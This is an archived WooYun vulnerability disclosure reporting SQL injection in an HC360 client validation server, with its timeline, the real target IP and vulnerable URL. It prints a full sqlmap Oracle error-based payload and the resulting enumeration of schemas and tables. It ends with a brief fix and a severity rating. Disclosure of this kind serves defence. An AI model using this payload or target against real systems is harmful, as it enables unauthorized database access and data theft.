乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2013-12-20: 细节已通知厂商并且等待厂商处理中 2013-12-20: 厂商已经确认,细节仅向厂商公开 2013-12-30: 细节向核心白帽子及相关领域专家公开 2014-01-09: 细节向普通白帽子公开 2014-01-19: 细节向实习白帽子公开 2014-02-03: 细节向公众公开
慧聪网#C段某客户端验证程序SQL注入
#1:C段了一下sso.hc360.com【IP地址:118.194.34.37】 目标服务器:http://118.194.34.35/是一个对客户端提交数据进行验证的服务器.
随便点击开一个页面加'发现存在注入。
http://118.194.34.35/validate/over.asp?type=d&providerid=018000005652'
#1:漏洞证明
Place: GETParameter: providerid Type: error-based Title: Oracle AND error-based - WHERE or HAVING clause (XMLType) Payload: type=u&providerid=023000043141' AND 8116=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(116)||CHR(118)||CHR(108)||CHR(58)||(SELECT (CASE WHEN (8116=8116) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(111)||CHR(97)||CHR(115)||CHR(58)||CHR(62))) FROM DUAL) AND 'ttxs'='ttxs---[16:25:35] [INFO] the back-end DBMS is Oracleweb server operating system: Windows 2000web application technology: ASP, Microsoft IIS 5.0back-end DBMS: Oracle[16:25:35] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes[16:25:35] [INFO] fetching database (schema) names[16:25:35] [INFO] the SQL query used returns 18 entries[16:25:36] [INFO] retrieved: ALARMDB[16:25:36] [INFO] retrieved: BUSIN[16:25:36] [INFO] retrieved: CTXSYS[16:25:36] [INFO] retrieved: DBSNMP[16:25:37] [INFO] retrieved: DMSYS[16:25:37] [INFO] retrieved: EXFSYS[16:25:37] [INFO] retrieved: HUDONG[16:25:37] [INFO] retrieved: MDSYS[16:25:37] [INFO] retrieved: OLAPSYS[16:25:38] [INFO] retrieved: ORDSYS[16:25:38] [INFO] retrieved: OUTLN[16:25:38] [INFO] retrieved: SCOTT[16:25:38] [INFO] retrieved: SYS[16:25:38] [INFO] retrieved: SYSMAN[16:25:39] [INFO] retrieved: SYSTEM[16:25:39] [INFO] retrieved: TSMSYS[16:25:39] [INFO] retrieved: WMSYS[16:25:39] [INFO] retrieved: XDBavailable databases [18]:[*] ALARMDB[*] BUSIN[*] CTXSYS[*] DBSNMP[*] DMSYS[*] EXFSYS[*] HUDONG[*] MDSYS[*] OLAPSYS[*] ORDSYS[*] OUTLN[*] SCOTT[*] SYS[*] SYSMAN[*] SYSTEM[*] TSMSYS[*] WMSYS[*] XDB[16:25:39] [WARNING] HTTP error codes detected during testing:500 (Internal Server Error) - 40 times[16:25:39] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\118.194.34.35'
Database: DBSNMP[21 tables]+---------------------------+| MGMT_BASELINE || MGMT_BASELINE_SQL || MGMT_BSLN_BASELINES || MGMT_BSLN_DATASOURCES || MGMT_BSLN_INTERVALS || MGMT_BSLN_METRICS || MGMT_BSLN_RAWDATA || MGMT_BSLN_STATISTICS || MGMT_BSLN_THRESHOLD_PARMS || MGMT_CAPTURE || MGMT_CAPTURE_SQL || MGMT_DB_FILE_GTT || MGMT_DB_SIZE_GTT || MGMT_HISTORY || MGMT_HISTORY_SQL || MGMT_LATEST || MGMT_LATEST_SQL || MGMT_RESPONSE_CONFIG || MGMT_SNAPSHOT || MGMT_SNAPSHOT_SQL || MGMT_TEMPT_SQL |+---------------------------+
权限很大的哦,涉及到的数据还是挺多的啦。
过滤,限制IP访问。
危害等级:中
漏洞Rank:8
确认时间:2013-12-20 18:27
谢谢
暂无